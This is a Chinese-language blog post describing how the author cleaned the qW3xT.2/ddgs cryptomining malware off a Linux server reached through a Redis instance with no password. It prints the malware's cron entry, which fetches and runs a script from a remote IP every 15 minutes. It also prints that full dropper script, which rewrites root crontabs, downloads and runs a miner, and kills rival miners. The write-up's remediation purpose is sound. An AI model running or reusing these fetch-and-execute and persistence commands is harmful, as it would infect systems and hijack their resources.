Linux 下qW3xT.2，解決挖礦病毒

早上開啟電腦，連接伺服器，使用top查看cpu狀態。結果顯示進程佔用cpu99%以上。

在網上百度，了解到qW3xT.2是一個挖礦病毒。也就是說別人利用你的電腦挖礦。謀取利益。

解決辦法：

1、首先解決redis入口問題，因為最開始沒有設置密碼，所以首先修改redis.conf。設置密碼，然後重啟redis

2、進入/tmp文件夾下。發現qW3xT.2文件，刪除。之後kill掉qW3xT.2該進程，但是一段時間之後，發現該行程又重新啟動。

肯定是有守護進程，觀察top命令下的進程，發現一個可疑的進行

3、在/tmp文件夾下發現該進程的文件 ls /tmp

發現qW3xT.2文件又重新生成了。這時，首先刪除qW3xT.2文件和ddgs.3013文件，然後使用top查詢qW3xT.2和ddgs.3013的pid，直接kill掉。

4、一段時間之後，刪除的文件重新生成，dds和挖礦的進程又重新執行。此時懷疑是否有計劃任務，此時查看計劃任務的列表

[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l
*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -r //刪除計劃任務

curl 的這幾個 optional 介紹,我也是百度的

-f - fail在HTTP錯誤（H）上靜默失敗（根本沒有輸出）

-s -silent靜音模式。 不要輸出任何東西

–socks4 HOST [：PORT]給定主機+埠上的SOCKS4代理

–socks4a HOST [：PORT]給定主機+埠上的SOCKS4a代理

–socks5 HOST [：PORT]給定主機+埠上的SOCKS5代理

–socks5-hostname HOST [：PORT] SOCKS5代理，將主機名傳遞給代理

–socks5-gssapi-service名稱為gssapi的SOCKS5代理服務名稱

–socks5-gssapi-nec與NEC SOCKS5伺服器的兼容性

-S –show-error顯示錯誤。 使用-s時，make curl會在出現錯誤時顯示錯誤

-L –location遵循重定向（H）

–location-trusted like –location並將auth發送給其他主機（H）

此時計劃任務已經刪除。詳細信息查看https://juejin.im/post/5b62b975f265da0f9628a820。

計劃任務刪除完成之後，這個13又開始運行。太頑固了。

於是我又看計劃任務的內容，是否是有東西沒有刪除乾淨。

[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
ps auxf | grep -v grep | grep Circle_MI | awk "{print $2}" | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk "{print $2}" | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk "{print $2}" | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk "{print $2}" | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk "{print $2}" | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk "{print $2}" | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk "{print $2}" | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk "{print $2}" | kill
發現計劃任務在伺服器中創建了幾個文件，
/var/spool/cron/crontabs/root
/var/spool/cron/root
內容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。（與計劃任務相同）
將計劃任務中創建的文件刪除。

最終，這個挖礦病毒終於刪除完成

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！